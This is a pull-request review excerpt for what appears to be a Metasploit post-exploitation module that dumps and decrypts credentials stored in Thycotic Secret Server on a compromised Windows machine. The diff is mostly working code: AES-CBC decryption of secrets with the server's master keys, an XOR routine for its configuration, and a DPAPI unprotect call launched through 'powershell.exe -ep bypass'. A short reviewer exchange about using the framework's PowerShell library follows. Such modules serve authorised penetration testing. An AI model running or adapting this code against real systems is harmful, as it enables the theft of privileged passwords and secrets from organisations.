modules/post/windows/gather/credentials/thycotic_secretserver_dump.rb

```diff
@@ -0,0 +1,449 @@
+    working_bytes = plaintext_conf[working_offset, byte_len]
+    val_len = working_bytes[0].unpack('H*').first.to_i(16).to_i
+    working_bytes[2, val_len]
+  end
+
+  def thycotic_secret_decrypt(options = {})
+    secret_id = options.fetch(:secret_id)
+    secret_field = options.fetch(:secret_field)
+    secret_value = options.fetch(:secret_value)
+    secret_key = options.fetch(:secret_key)
+    secret_iv = options.fetch(:secret_iv)
+    secret_miv = options.fetch(:secret_miv)
+    secret_use256 = options.fetch(:secret_use256)
+
+    if secret_use256 == 1
+      mek = @ss_key256
+    else
+      mek = @ss_key
+    end
+    intermediate_key = aes_cbc_decrypt(secret_key, mek, secret_miv)
+    if intermediate_key
+      decrypted_secret = aes_cbc_decrypt(secret_value, intermediate_key, secret_iv)
+    else
+      vprint_error("SecretID #{secret_id} field #{secret_field} intermediate key decryption failed")
+      decrypted_secret = false
+    end
+    unless decrypted_secret
+      vprint_warning("SecretID #{secret_id} field #{secret_field} decryption failed via intermediate key, attempting item key decryption")
+      decrypted_secret = aes_cbc_decrypt(secret_value, secret_key, secret_iv)
+      return false unless decrypted_secret
+    end
+    plaintext = decrypted_secret.delete("\000")[4..]
+    # Catch where decryption did not throw an exception but produced invalid UTF-8 plaintext
+    # This was evident in a few test cases where the secret value appeared to have been pasted from Microsoft Word
+    if !plaintext.force_encoding('UTF-8').valid_encoding?
+      plaintext = Base64.strict_encode64(decrypted_secret.delete("\000")[4..])
+      print_warning("SecretID #{secret_id} field #{secret_field} contains invalid UTF-8 and will be stored as a Base64 string in the output file")
+    end
+    plaintext
+  end
+
+  def xor_decrypt(ciphertext_bytes, xor_key)
+    pos = 0
+    res = []
+    for i in 0..ciphertext_bytes.length - 1 do
+      res[i] = ciphertext_bytes[i] ^ xor_key[pos]
+      pos += 1
+      if pos == xor_key.length
+        pos = 0
+      end
+    end
+    res
+  end
+
+  def aes_cbc_decrypt(ciphertext_bytes, aes_key, aes_iv)
+    return false unless aes_iv.length == 16
+
+    case aes_key.length
+    when 16
+      decipher = OpenSSL::Cipher.new('aes-128-cbc')
+    when 32
+      decipher = OpenSSL::Cipher.new('aes-256-cbc')
+    else
+      return false
+    end
+    decipher.decrypt
+    decipher.key = aes_key
+    decipher.iv = aes_iv
+    decipher.padding = 1
+    decipher.update(ciphertext_bytes) + decipher.final
+  rescue OpenSSL::Cipher::CipherError
+    return false
+  end
+
+  def dpapi_decrypt(b64)
+    cmd_str = "powershell.exe -ep bypass -nop -command \"Add-Type -AssemblyName System.Security;[Text.Encoding]::ASCII.GetString([Security.Cryptography.ProtectedData]::Unprotect([Convert]::FromBase64String('#{b64}'), $Null, 'LocalMachine'))\""
+    plaintext = cmd_exec(cmd_str)
```

Comment:
We have options to do command execution with PowerShell using built in library options defined in https://github.com/rapid7/metasploit-framework/blob/cc18c8d4abdd5bf63cb2949e8c806891b507bf3c/lib/msf/core/post/windows/powershell.rb. Would probably be better to utilize the library over there vs doing this via `cmd_exec`

Reply:
I did initially do this the "right" way, but it was fussy and also had to execute four separate commands to get output back. The routine for calling PSH is only ever invoked if DPAPI is in use, though, so I have no problem tweaking this.